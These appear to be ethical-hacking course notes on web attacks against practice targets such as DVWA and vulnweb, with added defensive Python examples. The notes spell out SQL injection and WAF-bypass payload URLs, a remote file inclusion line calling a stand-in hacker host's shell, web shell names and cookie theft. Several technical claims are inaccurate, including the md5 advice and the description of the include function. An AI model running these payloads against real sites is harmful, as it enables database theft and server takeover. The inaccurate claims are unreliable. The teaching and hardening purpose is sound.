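To see the statements listed above actually run, here is an added Python example (not from the original notes) that builds an in-memory SQLite database with Python's built-in sqlite3 module and executes one statement of each kind: CREATE TABLE with a CHECK constraint, CREATE INDEX, CREATE VIEW, INSERT, SELECT DISTINCT, WHERE with AND/OR, ORDER BY, LIKE with the % wildcard, IN, BETWEEN, aliases, UNION, IS NULL, INSERT INTO ... SELECT, UPDATE, DELETE, ALTER TABLE and DROP INDEX. Two dialect differences from the MySQL-style syntax on the page are noted in the code: SQLite spells the keyword AUTOINCREMENT and uses LIMIT where other databases use SELECT TOP. The customer rows are constructed and fictional.

```python
import sqlite3

# Schema for the examples: CREATE TABLE with a CHECK constraint, an INDEX and a VIEW.
# SQLite dialect notes: AUTOINCREMENT (MySQL: AUTO_INCREMENT); LIMIT replaces SELECT TOP.
SCHEMA = """
CREATE TABLE Customers (
    CustomerID   INTEGER PRIMARY KEY AUTOINCREMENT,
    CustomerName TEXT NOT NULL,
    City         TEXT,
    Country      TEXT NOT NULL,
    Balance      INTEGER NOT NULL CHECK (Balance >= 0)
);
CREATE INDEX idx_customers_city ON Customers (City);
CREATE VIEW GermanCustomers AS
    SELECT CustomerName, City FROM Customers WHERE Country = 'Germany';
CREATE TABLE Archive (CustomerName TEXT, Country TEXT);
"""

# Constructed sample rows (fictional customers). City is NULL for the last one.
ROWS = [
    ("Alfreds Futterkiste", "Berlin", "Germany", 120),
    ("Berglunds Snabbkop", "Lulea", "Sweden", 300),
    ("Bernard Hart", "Bern", "Switzerland", 0),
    ("Ana Trujillo", "Mexico City", "Mexico", 45),
    ("Island Trading", None, "UK", 80),
]


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany(
        "INSERT INTO Customers (CustomerName, City, Country, Balance) VALUES (?, ?, ?, ?)", ROWS)
    con.commit()
    return con


def check_constraint_blocks_negative(con) -> bool:
    """The CHECK constraint rejects a negative balance; True if the INSERT was refused."""
    try:
        con.execute("INSERT INTO Customers (CustomerName, Country, Balance) VALUES ('X', 'UK', -1)")
        return False
    except sqlite3.IntegrityError:
        return True


def run_examples(con) -> dict:
    """Run one statement of each kind from the list above and collect the results."""
    def col(sql):
        return [r[0] for r in con.execute(sql).fetchall()]   # first column of each row

    out = {}
    out["distinct"] = sorted(col("SELECT DISTINCT Country FROM Customers"))
    out["where_and"] = col("SELECT CustomerName FROM Customers WHERE Country='Germany' AND City='Berlin'")
    out["where_or"] = col("SELECT CustomerName FROM Customers WHERE City='Berlin' OR City='Bern' ORDER BY City")
    out["order_desc"] = col("SELECT CustomerName FROM Customers ORDER BY Balance DESC")
    out["like"] = col("SELECT City FROM Customers WHERE City LIKE 'Ber%' ORDER BY City")
    out["in"] = col("SELECT CustomerName FROM Customers WHERE Country IN ('Mexico','UK') ORDER BY CustomerName")
    out["between"] = col("SELECT CustomerName FROM Customers WHERE Balance BETWEEN 50 AND 150 ORDER BY Balance")
    out["alias"] = con.execute("SELECT CustomerName AS Name FROM Customers WHERE CustomerID = 1").fetchall()
    out["union"] = col("SELECT City FROM Customers WHERE Country='Germany' "
                       "UNION SELECT City FROM Customers WHERE Country='Sweden' ORDER BY 1")
    out["is_null"] = col("SELECT CustomerName FROM Customers WHERE City IS NULL")
    out["top2"] = col("SELECT CustomerName FROM Customers ORDER BY CustomerID LIMIT 2")
    out["view"] = con.execute("SELECT * FROM GermanCustomers").fetchall()
    con.execute("INSERT INTO Archive SELECT CustomerName, Country FROM Customers WHERE Country='Germany'")
    out["archive_count"] = col("SELECT COUNT(*) FROM Archive")[0]
    con.execute("UPDATE Customers SET City='Bremen' WHERE CustomerID=1")
    con.execute("DELETE FROM Customers WHERE Country='Switzerland'")
    out["after_update_delete"] = con.execute(
        "SELECT CustomerID, City FROM Customers WHERE CustomerID IN (1, 3)").fetchall()
    con.execute("ALTER TABLE Customers ADD COLUMN Email TEXT")
    con.execute("DROP INDEX idx_customers_city")
    out["columns"] = [r[1] for r in con.execute("PRAGMA table_info(Customers)")]
    return out


if __name__ == "__main__":
    db = build_db()
    print("CHECK blocks negative balance:", check_constraint_blocks_negative(db))
    for key, value in run_examples(db).items():
        print(f"{key:20} {value}")
```

Every query in run_examples carries an ORDER BY where the row order matters; without it a database is free to return rows in any order, which is the usual cause of "it worked yesterday" surprises when a table grows or an index is added.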

SQL Injection

SQL injection is a code injection technique, used to attack data-driven applications, in
which malicious SQL statements are inserted into an entry field for execution (e.g. to
dump the database contents to the attacker). SQL injection must exploit a security
vulnerability in an application's software, for example, when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or
user input is not strongly typed and unexpectedly executed. SQL injection is mostly
known as an attack vector for websites but can be used to attack any type of SQL
database.

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause
repudiation issues such as voiding transactions or changing balances, allow the
complete disclosure of all data on the system, destroy the data or make it otherwise
unavailable, and become administrators of the database server.

Source

Insecure Direct Object Reference

Insecure Direct Object Reference means accessing some objects or critical data through
unauthorized access. This is done by just changing some IDs, strings, directories
etc. in the URL. This happens because of a lack of security on every critical file.

Sensitive Data Exposure

Sensitive Data Exposure means critical data of a website is exposed on search engines.
This happens due to not securing each and every file in the web directory. Search engines
scan every directory and every file of websites. In search results they expose some
critical data like usernames, passwords, credit card details etc.

DVWA Setup and Configuration

First we have to set up the XAMPP server, and then copy our DVWA framework
folder to the htdocs folder of the XAMPP installation directory. After moving the folder to the XAMPP
folder, start XAMPP's Apache and MySQL servers. After all these steps, visit
your localhost and add the folder's directory to the URL. Now your DVWA framework is configured
for work.

Union Based SQL Injection

Target: http://127.0.0.1/dvwa/vulnerabilities/sqli/

Database -> Tables -> Columns -> Data

Step 1: Find any GET parameter in the URL of the website.

http://127.0.0.1/dvwa/vulnerabilities/sqli/

GET : .php?id=10

POST: .php

? ----> There is a table in the database.


.php?id=2 --> select id=2 front column values.

Users

ID First Name Last Namw

2 Giorden Brown

Step 2: Check the exception handling of the website.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2'&Submit=Submit#

Step 3: Count the total number of columns in the respective URL table.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 order by 1--+ &Submit=Submit#

Step 4:Dump the DDL of the table's columns for custom query execution.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select 1,2--+ &Submit=Submit#

Step 5: Check the database and version of the mysql.


http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select database(),version()--+
&Submit=Submit#

Table: information_schema.tables

Columns :information_schema.columns

Step 6: Extract the entire database tables on the front end.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select

1,table_name from information_schema.tables--+ &Submit=Submit#

Target : users

Step 7: Get the columns of the users table

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select

1,column_name from information_schema.columns where

table_name=char(117 ,115 ,101 ,114 ,115)--+ &Submit=Submit#

Step 8: Get the data from columns user and passwords

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select user,password from users--+ &Submit=Submit#

Security

--------

1. Never use GET methods.

2. Always store passwords at least as a salted md5 hash.

3. Use HTTPS for encrypted communication: 128 bit.

Organisation

4. Proper validation of database inputs coming from the end users.

For : www.owasp.org : SQL Injection

a= alpha

a=char

apple=word

apple=string

users-->string ????

Validation ---> string

String ---> ASCII
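The Union-Based steps above and point 4 of the Security list are two sides of one bug: the id from the GET parameter is pasted into the SQL text. The following is an added Python example, not code from the page or from DVWA, that shows the vulnerable lookup beside its hardened form. It uses an in-memory SQLite stand-in for the DVWA users table (constructed rows, placeholder password hashes) and the Step 8 union payload as a plain string; the `--` comment terminator is kept so the query stays syntactically valid.

```python
import sqlite3

# Constructed in-memory stand-in for the DVWA "users" table used in the steps above.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,"
        " username TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "admin", "admin", "admin", "hash-placeholder-1"),
            (2, "Gordon", "Brown", "gordonb", "hash-placeholder-2"),
        ],
    )
    return con


def lookup_vulnerable(con, user_id):
    """The DVWA-style bug: the raw GET parameter becomes part of the SQL text."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return con.execute(sql).fetchall()


def lookup_hardened(con, user_id):
    """Point 4 of the Security list: validate the input, then bind it as a parameter."""
    # Validation: an id is a string of ASCII digits and nothing else.
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("user id must be numeric")
    # Parameterised query: the value travels separately from the SQL, so it can
    # never be parsed as SQL no matter what it contains.
    return con.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchall()


def rejects(con, value):
    """True when the hardened lookup refuses the value before it reaches the database."""
    try:
        lookup_hardened(con, value)
    except ValueError:
        return True
    return False


# The Step 8 union payload (comment terminator included), as a plain string.
PAYLOAD = "2' union select username, password from users-- "


def demo():
    con = make_db()
    leaked = lookup_vulnerable(con, PAYLOAD)      # union rows come back beside the real one
    return {
        "normal": lookup_hardened(con, "2"),
        "leaked_rows": len(leaked),
        "blocked": rejects(con, PAYLOAD),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable function returns three rows for the payload (the real row plus one union row per user), while the hardened one refuses the value before any SQL is built; had it been accepted, the bound parameter would still have been compared as a literal string, never executed. Note that the page's advice to store passwords as salted md5 is a minimum; a deliberately slow password hash (bcrypt, scrypt or Argon2) is the current recommendation.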

ERROR BASED SQL INJECTION


Error-based injection is used against databases powered by MS-SQL.

Database: MySQL : PHP

MS-SQL : .asp or .aspx

Problems with error-based injection for a hacker

1. version() and database() do not work.

Solution: @@version
2. You cannot call all the tables of the given database through information_schema at once.
3. You cannot extract the columns of your target table in one go.

Target: vulnweb.com: it is a practice framework from a company called Acunetix.

It has practice targets for both MySQL and MS-SQL attack techniques.

Step 1: Find any GET parameter in the URL of the website, i.e. look for any
Something=Something.
http://testasp.vulnweb.com/showforum.asp?id=0

Step 2: Check the exception handling.


http://testasp.vulnweb.com/showforum.asp?id=0'

Step 3: Check the conditions required for further attack.


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=0;

Note: Error-based injection works on the LIFO rule (Last In, First Out).
For Example: If we have a database with tables like followings
threads -> 1
teacher->2
classes->3
fee->4
users->5

Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables));

Got table: 'threads' X

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads')));

Target: 'users'

Step 5: Get the respective columns of the users table


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));

Target columns: uname, upass

Step 6: Get the uname and upass


http://testasp.vulnweb.com/showforum.asp?id=0 and

1=convert(int,(select top 1 upass from users));

uname:admin
upass: none

Google Dorks
Google Dork or Google Hacking means using advanced Google search filters to find a
specific result. Hackers use these filters to find unexpectedly exposed data such as SQL
admin panels, credit card numbers, etc.
History of Google Dorks: The concept of "Google Hacking" dates back to 2002,
when Johnny Long began to collect interesting Google search queries that uncovered
vulnerable systems and/or sensitive information disclosures - labeling them google
Dorks.

The list of google Dorks grew into large dictionary of queries, which were eventually
organized into the original Google Hacking Database (GHDB) in 2004.These Google
hacking techniques were the focus of a book released by Johnny Long in 2005, called
Google Hacking for Penetration Testers, Volume 1. Since its heyday, the concepts
explored in Google Hacking have been extended to other search engines, such as Bing
and Shodan. Automated attack tools use custom search dictionaries to find vulnerable
systems and sensitive information disclosures in public systems that have been indexed
by search engines.

But in 2012 Google held an open challenge for anyone to infiltrate their resisting
servers. For a full visual timeline, detailing the major events and developments in
Google Hacking from 2002 to Present, see the Google Hacking History by Bishop Fox.

History Source

Some Google Dorks:


1. intitle: - the intitle operator is used to find a specified title of a website.
2. inurl: - the inurl operator is used to find specific text in the URL.
3. intext: - the intext operator is used to search within the text (description) of a
website.
4. index: - the index operator is used to find specific web directories and files.
5. cache: - cache is used to find the cached version of a site.
6. link: - the link operator is used to find sites linked with a particular site.
7. site: - the site operator is used to find search results on a specific website.
8. filetype: - this query is used to find results of a specific file type or
extension.
9. define: - the define operator is used to find the explanation or definition of a word.
10. related: - related is used to find search results related to that specific word.
11. info: - this operator is used to find info about a particular domain.
12. source: - this is used to find search results from a specific website.
13. weather: - this is used to get weather details for a particular postal code.
14. author: - this query is used to find books or articles by a specific writer.
15. location: - this query restricts the results to a specific location.
16. allinurl: - the same as inurl, but every searched word must appear in the
URL.
17. allintext: - the same as intext, but every searched word must appear in the
text.
18. allintitle: - the same as intitle, but every searched word must appear in the
title.
19. inanchor: - this search query filters on the anchor text of links.
20. phonebook: - this operator is used to find the phone number of a particular person or
organisation.

Introduction to Web Application Firewall, IDS and IPS

IDS: Intrusion Detection System: it can be an application or hardware, mainly deployed to
analyse the network traffic, understand the type of attack and let the owner know which
IP address is performing what type of attack within the organisation.

IPS: Intrusion Prevention System: again it works on a black list coupled with a large
database of attacks; if anyone in the network applies an attack that matches the database
of attacks, the IPS blocks the request and that IP can no longer communicate on the same
network, i.e. a black-listed IP address.

Web Application Firewall: when a website owner deploys an application containing all kinds
of attack database in it and filters the requests sent by the visitor, then the application
deployed on the website is a web application firewall.

Types of WAF
1. Software WAF: these are firewall technologies which, just like a software application,
can be installed on the web server and used to filter the requested contents.

Linux : ModSecurity : Free | Paid : .php

Windows : dotDefender : Paid : .asp .aspx

2. Hardware WAF: these are the UTM systems (Unified Threat Management Systems), i.e. they
contain Antivirus + Firewall + IDS and IPS + web filtration for content, etc.

ModSecurity: ModSecurity came into the picture in early 2008, when hackers were at their
peak and defacing websites all over the world. This was an era when there were many paid
firewalls but no solution for mid-level organisations.

ModSecurity came and gave website owners a little hope that they would be protected from
hackers.

Problems

1. Attack database was limited.


2. Open source but lack of funding.

OWASP TOP 10 Attack they made open. Call to Hackers.

How to Install Mod Security on Ubuntu


--------------------------------------
$ sudo apt-get install libapache2-mod-security
$ sudo a2enmod mod-security
$ sudo /etc/init.d/apache2 force-reload

Understanding the working of WAF

Every WAF works on two principal formats: white list and black list filtration.
1. White list: when we declare that the owner must only log in from a certain static IP
and MAC address, together with username and password. Hence even if the password gets
leaked, no one can log in to the website unless he is on the same IP and MAC address.

2. Black list: it is the second way of securing the website; it has a database of all the
nonsense attack strings, especially string-based ones ( order by ), (union all select)
etc. Hence any request from a VISITOR carrying this kind of string gets filtered by the
black list and in response is blocked if it matches any string from the list.

How to Configure Your Mod Security in Ubuntu After Installation

sudo gedit /etc/apache2/sites-available/000-default.conf
After opening this file, i.e. 000-default.conf, we have to change the IP address of the
server or the website name whose traffic we want ModSecurity to filter.

Bypassing WAF Validations and Filterations

1. Upper Lower Case Method

union all select :UnIoNaLlSeLeCt


http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' UnIoN SeLeCt 1,2--
+&Submit=Submit#

Inline Comments : /* */

2. Inline Executable Comments


/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
Step 1: Get the tables from the database
http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
1,2--+&Submit=Submit#

Target Table is users

Step 2: get the columns


http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
1,column_name from information_schema.columns where table_name='users'--
+&Submit=Submit#

Version Based Inline Executable Comments

/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/

Step 3: http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1'
/*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,column_name from
information_schema.columns where table_name='users'--+&Submit=Submit#
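The black-list description under "Understanding the working of WAF" and the three bypasses just shown (mixed case, inline executable comments, version-based executable comments) are the same story from two sides: a literal string match fails as soon as the request is spelled differently from the list entry. The following is an added Python example, not the page's own code and not ModSecurity's, that runs a naive black list and a normalising one over a few constructed request lines built from the page's own URLs, so the difference is visible. The signature list and log lines are constructed for the example.

```python
import re

# Constructed request log lines: one benign, the Union-Based Step 4 payload, and the
# three bypass variants from the WAF section (mixed case, inline executable
# comments, version-based executable comments).
REQUESTS = [
    "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit",
    "GET /dvwa/vulnerabilities/sqli/?id=2 union select 1,2--+&Submit=Submit",
    "GET /dvwa/vulnerabilities/sqli/?id=1' UnIoN SeLeCt 1,2--+&Submit=Submit",
    "GET /dvwa/vulnerabilities/sqli/?id=1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,2--+&Submit=Submit",
    "GET /dvwa/vulnerabilities/sqli/?id=1' /*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,2--+&Submit=Submit",
]

# Black-list strings, as the page describes them (constructed list).
SIGNATURES = ("union select", "union all select", "order by", "information_schema")


def naive_blacklist(request):
    """Literal substring match: exactly what a simplistic black list does."""
    return any(sig in request for sig in SIGNATURES)


def normalize(request):
    """Undo the three evasions before matching, the way the DBMS parser would."""
    q = request.replace("+", " ")           # '+' is an encoded space in a query string
    q = re.sub(r"/\*!\d*", " ", q)          # opener of a MySQL executable comment: /*! or /*!50000
    q = re.sub(r"/\*.*?\*/", " ", q)        # ordinary inline comments are ignored by the DBMS
    q = q.replace("*/", " ")                # closers left over from executable comments
    q = re.sub(r"\s+", " ", q)              # collapse runs of whitespace
    return q.lower().strip()                # case-fold: SQL keywords are case-insensitive


def normalized_blacklist(request):
    return naive_blacklist(normalize(request))


def scan(requests=REQUESTS):
    """Return (naive_hit, normalized_hit) per request, in order."""
    return [(naive_blacklist(r), normalized_blacklist(r)) for r in requests]


if __name__ == "__main__":
    for line, hits in zip(REQUESTS, scan()):
        print(hits, line)
```

Only the plain lowercase payload trips the naive list; after normalisation all four injected requests match. Normalisation of this kind is never exhaustive (the form `UnIoNaLlSeLeCt` with no separators is not even valid SQL, and encodings can be stacked), which is why the filter is a detection layer and the parameterised queries asked for in the Security section remain the actual fix.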

Honeypots
Honeypots are traps deployed by web developers in which hackers try to attack, and the
honeypot logs the IP and cookies of the hackers for further law-enforcement
activities.

Types of Honeypots
1. Production honeypot: these are mid-level honeypots deployed by mid-level
organisations as they are cheap, easy to deploy and easy to monitor. But they come up
with only a simple report as outcome.

2. Research honeypot: developed by government agencies for research purposes or
national security, hence they are deployed on sensitive sites such as nuclear power
plants, oil pipeline framework controls, etc. Research honeypots are very expensive in
nature and give very extensive information about any mishap that occurred, which is
also very difficult to understand and monitor.

Blind injection
Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that
asks the database true or false questions and determines the answer based on the
applications response. This attack is often used when the web application is configured
to show generic error messages, but has not mitigated the code that is vulnerable to
SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error
messages from the database complaining that the SQL Query's syntax is incorrect. Blind
SQL injection is nearly identical to normal SQL Injection, the only difference being the
way the data is retrieved from the database. When the database does not output data
to the web page, an attacker is forced to steal data by asking the database a series of
true or false questions. This makes exploiting the SQL Injection vulnerability more
difficult, but not impossible.

Time based SQL Injection


Time-based techniques are often used to achieve tests when there is no other way to
retrieve information from the database server. This kind of attack injects a SQL segment
which contains a specific DBMS function or heavy query that generates a time delay.
Depending on the time it takes to get the server response, it is possible to deduce some
information. As you can guess, this type of inference approach is particularly useful for
blind and deep blind SQL injection attacks.

Injecting a Time Delay:-


Time-based attacks can be used to achieve very basic tests like determining whether
a vulnerability is present. This is usually an excellent option when the attacker is facing a
deep blind SQL injection. In this situation, only delay functions/procedures are
necessary. The table below shows how the query execution can be paused in each
DBMS.

Arbitrary File Uploading


It is a process in which hackers are able to upload a PHP- or ASP-based control panel of
their own functionality and then access the entire server through it instead of only the
admin panel.

Simple Control Panel:-


1. In simple control panel you cannot see the source code of the pages.

2. You cannot edit, delete and update page directly.

3. You cannot dump the entire database by interacting with through the control panel.

4. You cannot replace the existing pages in LIVE environment.

5. You cannot see the other website's code and other stuff which are on the same server
on which your website is hosted.

Hackers Control Panel:-


1. You can see the entire source code, you can edit the source code and you can delete
the source code.

2. If the server has 777 permissions then you can even traverse the entire server HDD,
access other websites' data too and damage the same.

3. You can dump the entire data base once you started interaction with the machines.

Shell: The extreme control on something.

Windows Shell : cmd.exe

MAC/Linux : terminal

www.rahul.com ---> Update

training.html --> FTP connect --> Upload --> www.rahul.com

www.rahul.com/hello/main/test/etc/regular/www/upload.php

Step 1: They hack into the admin panel.

Step 2: Look for any upload options like:

- Upload images

- Upload image gallery

- Upload your CV

- Upload the pdf

Step 3: According to the technology and web server support we will upload our control
panel, i.e. the hacker's control panel, on the website.

Simple uploading: when there is no validation on the content of the uploaded file.

For example: if there is an option for uploading a .jpg file, you can still upload a PDF
file, and if you can upload a PDF file you can also upload your PHP shell file.

www.xyz.com/images/hack.php
Tough uploading: when the web developer deploys a static validation that only this file
format can be uploaded.

Hence in this situation it is tough but not impossible. :)

Windows : c99.asp , r57.asp , kikicoco.asp

Linux : c99.php , r57.php, b374k.php
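The "simple uploading" case above is an upload handler that trusts the file name, and the "tough uploading" case is one that checks only the extension. The following is an added Python example, not code from the page or from any web framework, of the checks an upload handler needs so that neither the `hack.php` nor the `.php`-disguised-as-image cases get through: an extension allow-list, no double extensions, magic-byte check of the content, a size cap, and a server-chosen storage name. The allow-list, size limit and sample inputs are constructed for the example.

```python
import os
import secrets

# Allowed extensions and the magic bytes a genuine file of that type starts with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".pdf": b"%PDF-",
}
MAX_BYTES = 5 * 1024 * 1024  # constructed limit for the example


def validate_upload(filename, content):
    """Return (accepted, reason_or_ext). Rejects by size, name, double extension and content."""
    if len(content) > MAX_BYTES:
        return False, "too large"
    base = filename.replace("\\", "/").split("/")[-1]   # ignore any directory part (../../)
    name, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"           # hack.php, shell.asp
    if "." in name or name == "":
        return False, "double or empty extension"       # shell.php.jpg, .jpg
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension"  # a PHP file renamed to .jpg
    if b"<?php" in content:
        return False, "script markers inside file"      # valid image header with PHP appended
    return True, ext


def storage_name(ext):
    """Never keep the visitor's filename: a random server-side name ends path games
    and accidental overwrites of existing files."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample uploads: (name, first bytes of content)
    samples = [
        ("hack.php", b"<?php echo 1; ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0 image data"),
        ("photo.jpg", b"<?php echo 1; ?>"),
        ("photo.JPG", b"\xff\xd8\xff\xe0 image data"),
        ("cv.pdf", b"%PDF-1.4 document"),
    ]
    for name, data in samples:
        print(name, validate_upload(name, data))
```

Accepted files still have to be stored outside the document root, or in a directory where the web server is configured not to execute scripts, and served with a fixed Content-Type; the name check alone is what the "tough uploading" paragraph says is bypassable.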

The need for automated web application security scanning:-

Manual vulnerability auditing of all your web applications is complex and time
consuming,since it generally involves processing a large volume of data. It also demands
a high level ofexpertise and the ability to keep track of considerable volumes of code
used in a web application. In addition, hackers are constantly finding new ways to
exploit your web application, which means that you would have to constantly monitor
the security communities, and find new vulnerabilities in your web application code
before hackers discover them.

Tools for Automated VAPT:-


1. Acunetix Web Vulnerability Scanner

2. Netsparker Web Vulnerability Scanner

3. OWASP ZAP Web Application Scanner


Introduction to Burp Suite

It’s an application designed to formulate the entire vulnerability assessment criteria in
such a manner that penetration testers get a detailed and structured report of what to
exploit and what not to.

Mainly Burp Suite contains a large number of attacks and is highly popular due to POST
parameter discovery.

Instead of looking for vulnerable parameters one by one on the page, we will scan the
entire website and will extract all possible GET and POST hidden parameters which may
or may not be exploitable.

History
Burp Suite comes from a company known as PortSwigger, which mainly works as a VA tool
development organization with respect to OWASP TOP 10 standards.

Home Version: Free of Cost

Pro Version: Paid $299

Burp Suite is coded in Java hence it’s a platform independent application.

.jar file executable in nature.


Permutations and Combinations Based Brute Forcing
In this brute forcing attack, we mainly write or get a script which tries all possible
combinations of a-z, A-Z, 0-9 and all special characters, including space, etc.

Mainly this attack is deployed via a technology known as CrossFire technology from
AMD or SLI technology from NVIDIA.

This makes it possible to run two or more graphics cards at the same time to execute the
brute forcing process; hence with more core speed via the graphics cards it gives a much
better, more stable speed and results much more quickly compared to a computer using
only a simple CPU.

For example: the FireForce Mozilla plugin or Hydra.

Dictionary Based Brute Forcing


In this attack we try a certain number of possible passwords against the target to
guess the credentials. We use a dictionary containing millions of stored passwords to
attempt the brute force attack.

For Example: Burp Suite
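Both brute forcing variants above depend on the login form answering an unlimited number of guesses. The following is an added Python example, not code from the page or from Burp Suite or Hydra, of the server-side counter-measure: a sliding-window throttle keyed on both the username and the source IP, so a dictionary run from one address trips the IP bucket and a low-and-slow run over many addresses still trips the username bucket. The limits and the fake clock used for testing are constructed for the example.

```python
import time
from collections import deque


class LoginThrottle:
    """Lock a username or a source IP after too many failures inside a sliding window."""

    def __init__(self, max_failures=5, window_seconds=300, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window_seconds
        self.clock = clock                       # injectable so tests can move time
        self.failures = {}                       # key -> deque of failure timestamps

    def _recent(self, key):
        now = self.clock()
        bucket = self.failures.setdefault(key, deque())
        while bucket and now - bucket[0] > self.window:
            bucket.popleft()                     # drop failures older than the window
        return bucket

    def is_locked(self, username, source_ip):
        # Keyed per username AND per IP: a dictionary run from one IP hits the IP bucket,
        # a slow run spread over many IPs still hits the username bucket.
        return any(len(self._recent(k)) >= self.max_failures
                   for k in (("user", username), ("ip", source_ip)))

    def record_failure(self, username, source_ip):
        now = self.clock()
        for k in (("user", username), ("ip", source_ip)):
            self._recent(k).append(now)

    def record_success(self, username, source_ip):
        self.failures.pop(("user", username), None)   # the IP bucket is left alone on purpose


def check_login(throttle, username, source_ip, password_ok):
    """Throttle first, then verify; the caller gets one of 'locked', 'ok', 'invalid'."""
    if throttle.is_locked(username, source_ip):
        return "locked"                          # even a correct password waits out the lock
    if password_ok:
        throttle.record_success(username, source_ip)
        return "ok"
    throttle.record_failure(username, source_ip)
    return "invalid"


if __name__ == "__main__":
    th = LoginThrottle(max_failures=3, window_seconds=60)
    for _ in range(4):
        print(check_login(th, "admin", "10.0.0.5", False))
```

The "locked" answer is returned before the password is checked, so an attacker learns nothing from the lock about whether the guess was right; pair it with logging of the (username, IP) pair so the IDS/IPS material later on the page has something to alert on.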


File Inclusion Vulnerability

It’s an attack in which we try to execute certain files by including them through an outdated CSS part of
the website known as the include function.

This include function accepts any kind of executable code file from any untrusted source and includes the
same code in the existing page on which the include function is deployed.

Remote File Inclusion

www.bank.com/load.html?include=http://www.hi.com/rs.jsp

RFI Shell

www.bank.com/load.html?include=www.hacker.com/shell.php

Command Execution Vulnerability

When a website gives you an interaction point to execute a certain level of shell
commands through the application layer, then we can say the website is vulnerable to
command execution.

127.0.0.1: Ping ---> server (cmd.exe) ---> output --> show


Once the server gives a reply to the ping command, then we can execute any kind of
command on the server.
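The ping flow above works for an attacker because the visitor's text is appended to a shell command line, so a separator such as `;` starts a second command. The following is an added Python example, not code from the page or from DVWA, showing the vulnerable construction beside a hardened one that accepts only a literal IP address and hands it to `ping` as a separate argv element with no shell involved. The `-c 1` flag is the Linux/macOS count option; on Windows it would be `-n 1`.

```python
import ipaddress
import subprocess


def ping_command_vulnerable(host):
    """What the vulnerable page does: the visitor's text becomes part of one shell line."""
    return "ping -c 1 " + host       # 'ping -c 1 127.0.0.1; id' runs id as well


def ping_argv_hardened(host):
    """Accept only a literal IP address and pass it to ping as its own argument."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError("rejected: %r is not an IP address" % host) from None
    # An argv list goes straight to execve: no shell ever sees the string, so
    # ';', '|', '&&', backticks and newlines carry no meaning.
    return ["ping", "-c", "1", str(addr)]


def is_rejected(host):
    """True when the hardened builder refuses the value."""
    try:
        ping_argv_hardened(host)
    except ValueError:
        return True
    return False


def run_ping(host, timeout=5):
    """Validate, then run without shell=True; returns (exit code, stdout)."""
    argv = ping_argv_hardened(host)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return done.returncode, done.stdout


if __name__ == "__main__":
    print(ping_command_vulnerable("127.0.0.1; id"))   # the string a shell would run
    print(ping_argv_hardened("127.0.0.1"))            # the argv the hardened path builds
    print(is_rejected("127.0.0.1; id"))
```

If the feature must also accept host names, validate them against a strict hostname pattern rather than passing the raw string through; the argv list still prevents shell interpretation, but `ping` itself will happily resolve whatever name it is given.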
Introduction to JavaScript

It is concerned with the behaviour of web pages depending on the user's inputs. It is mainly
deployed on dynamic web pages for validation purposes.

For example: a simple JavaScript code can be deployed to execute a client-side
validation that checks the input for SQL injection.

Syntax:
<script> ---> Starting Tag

</script> ---> Ending Tag

Alert: this function is used to draw a pop-up box known as a dialogue box. Whatever is
written as the body (argument) of the function is shown as text on the box.

Syntax: <script>alert () </script>

Here you can write two types of data: string and integer.
<script>alert ("Welcome to Site”) </script>

<script>alert (1) </script>

Prompt: it is the same as alert but also gives a text field to write your own text. But it will
not affect the working of the pop-up, hence only with a read-only property.

<script>prompt("hi”) </script>

Stealing Sessions via Cookies

Every website holds a cookie and a respective session in browser memory, hence if we are
able to get the cookie we can embed the same cookie in our browser, and as we open the
same site we enter the same session as the victim.
<script>alert(document.cookie)</script>

Cross Site Scripting


XSS (Cross Site Scripting vulnerability): it is the 3rd vulnerability of the OWASP TOP 10,
